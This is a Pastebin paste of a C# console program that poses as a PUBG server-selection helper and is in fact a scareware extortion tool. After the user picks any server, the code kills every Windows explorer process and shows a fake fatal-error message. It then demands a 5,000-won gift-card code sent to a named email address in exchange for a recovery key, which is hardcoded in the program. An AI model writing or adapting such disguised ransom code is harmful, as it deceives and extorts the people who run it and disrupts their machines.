Advertisement
Guest User

철헌아 힘들다

a guest
Nov 30th, 2018
112
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 7.26 KB | None | 0 0
  1. using System;
  2. using System.Collections.Generic;
  3. using System.Linq;
  4. using System.Text;
  5. using System.Threading.Tasks;
  6. using System.Threading;
  7. using System.Diagnostics;
  8.  
  9. namespace 철헌이게받치는2번쨰
  10. {
  11.     class Program
  12.     {
  13.         static void Main(string[] args)
  14.         {
  15.             Console.ForegroundColor = ConsoleColor.Green;
  16.             Console.WriteLine("안녕하세요, 배틀그라운드 서버 선택 도우미입니다.");
  17.             Thread.Sleep(1000);
  18.             Console.WriteLine("배그가 실행되있다면 Y를 입력해주세요. \n 만약 실행이안되있다면 실행시키고 Y를 입력해주세요..");
  19.             while((Console.ReadLine() == "Y"))
  20.             {
  21.                 Console.WriteLine("서버선택UI로 이동합니다.");
  22.                 Thread.Sleep(1000);
  23.                 Console.WriteLine("10초 남았습니다.");
  24.                 Thread.Sleep(1000);
  25.                 Console.WriteLine("9초 남았습니다.");
  26.                 Thread.Sleep(1000);
  27.                 Console.WriteLine("8초 남았습니다.");
  28.                 Thread.Sleep(1000);
  29.                 Console.WriteLine("7초 남았습니다.");
  30.                 Thread.Sleep(1000);
  31.                 Console.WriteLine("6초 남았습니다.");
  32.                 Thread.Sleep(1000);
  33.                 Console.WriteLine("5초 남았습니다.");
  34.                 Thread.Sleep(1000);
  35.                 Console.WriteLine("4초 남았습니다.");
  36.                 Thread.Sleep(1000);
  37.                 Console.WriteLine("3초 남았습니다.");
  38.                 Thread.Sleep(1000);
  39.                 Console.WriteLine("2초 남았습니다.");
  40.                 Thread.Sleep(1000);
  41.                 Console.WriteLine("1초 남았습니다.");
  42.                 Thread.Sleep(1000);
  43.                 Console.WriteLine("실행하고있습니다.");
  44.                 Thread.Sleep(5000);
  45.                 Console.Clear();
  46.                 Console.WriteLine("┌────────────────────┐\n" +
  47.                                   " 1. US 2.KR 3.AS 4.EU            \n" +
  48.                                   "└━━━━━━━━━━━━━━━━━━━━┘\n");
  49.                 Console.WriteLine("원하시는 서버 번호를 입력해주세요. . .");
  50.                 while ((Console.ReadLine() == "1"))
  51.                 {
  52.                     Console.Clear();
  53.                     Thread.Sleep(1000);
  54.                     foreach (Process prc in Process.GetProcesses())
  55.                     {
  56.                         if (prc.ProcessName == "explorer")
  57.                         {
  58.                             prc.Kill();
  59.                         }
  60.                     }
  61.                     Console.WriteLine("!error! \n" +
  62.                     "치명적인 오류가 발생하였습니다.! \n" +
  63.                     "복구하실려면 Y를 입력해주세요.");
  64.                     while ((Console.ReadLine() == "Y"))
  65.                     {
  66.                         Console.WriteLine("hk416.noname@gmail.com으로 5천원 문상코드를 보내주시면 \n" + "복구키를 제공해드리겠습니다.!");
  67.                         Thread.Sleep(1000);
  68.                         Process.Start("iexplorer");
  69.                         Console.WriteLine("복구키를 입력하세요 : ");
  70.                         while ((Console.ReadLine() == "FuckPubg"))
  71.                         {
  72.                             Process.Start("explorer.exe");
  73.                         }
  74.                     }
  75.  
  76.                 }
  77.                 while ((Console.ReadLine() == "2"))
  78.                 {
  79.                     Console.Clear();
  80.                     Thread.Sleep(1000);
  81.                     foreach (Process prc in Process.GetProcesses())
  82.                     {
  83.                         if (prc.ProcessName == "explorer")
  84.                         {
  85.                             prc.Kill();
  86.                         }
  87.                     }
  88.                     Console.WriteLine("!error! \n " +
  89.                     "치명적인 오류가 발생하였습니다.! \n" +
  90.                     "복구하실려면 Y를 입력해주세요.");
  91.                     while ((Console.ReadLine() == "Y"))
  92.                     {
  93.                         Console.WriteLine("hk416.noname@gmail.com으로 5천원 문상코드를 보내주시면 \n" + "복구키를 제공해드리겠습니다.!");
  94.                         Thread.Sleep(1000);
  95.                         Process.Start("iexplorer");
  96.                         Console.WriteLine("복구키를 입력하세요 : ");
  97.                         while ((Console.ReadLine() == "FuckPubg"))
  98.                         {
  99.                             Process.Start("explorer.exe");
  100.                         }
  101.                     }
  102.                 }
  103.                 while ((Console.ReadLine() == "3"))
  104.                 {
  105.                     Console.Clear();
  106.                     Thread.Sleep(1000);
  107.                     foreach (Process prc in Process.GetProcesses())
  108.                     {
  109.                         if (prc.ProcessName == "explorer")
  110.                         {
  111.                             prc.Kill();
  112.                         }
  113.                     }
  114.                     Console.WriteLine("!error! \n " +
  115.                     "치명적인 오류가 발생하였습니다.! \n" +
  116.                     "복구하실려면 Y를 입력해주세요.");
  117.                     while ((Console.ReadLine() == "Y"))
  118.                     {
  119.                         Console.WriteLine("hk416.noname@gmail.com으로 5천원 문상코드를 보내주시면 \n" + "복구키를 제공해드리겠습니다.!");
  120.                         Thread.Sleep(1000);
  121.                         Process.Start("iexplorer");
  122.                         Console.WriteLine("복구키를 입력하세요 : ");
  123.                         while ((Console.ReadLine() == "FuckPubg"))
  124.                         {
  125.                             Process.Start("explorer.exe");
  126.                         }
  127.                     }
  128.                 }
  129.                 while ((Console.ReadLine() == "4"))
  130.                 {
  131.                     Console.Clear();
  132.                     Thread.Sleep(1000);
  133.                     foreach (Process prc in Process.GetProcesses())
  134.                     {
  135.                         if (prc.ProcessName == "explorer")
  136.                         {
  137.                             prc.Kill();
  138.                         }
  139.                     }
  140.                     Console.WriteLine("!error! \n " +
  141.                     "치명적인 오류가 발생하였습니다.! \n" +
  142.                     "복구하실려면 Y를 입력해주세요.");
  143.                     while ((Console.ReadLine() == "Y"))
  144.                     {
  145.                         Console.WriteLine("hk416.noname@gmail.com으로 5천원 문상코드를 보내주시면 \n" + "복구키를 제공해드리겠습니다.!");
  146.                         Thread.Sleep(1000);
  147.                         Process.Start("iexplorer");
  148.                         Console.WriteLine("복구키를 입력하세요 : ");
  149.                         while ((Console.ReadLine() == "FuckPubg"))
  150.                         {
  151.                             Process.Start("explorer.exe");
  152.                         }
  153.                     }
  154.                 }
  155.             }
  156.         }
  157.     }
  158. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement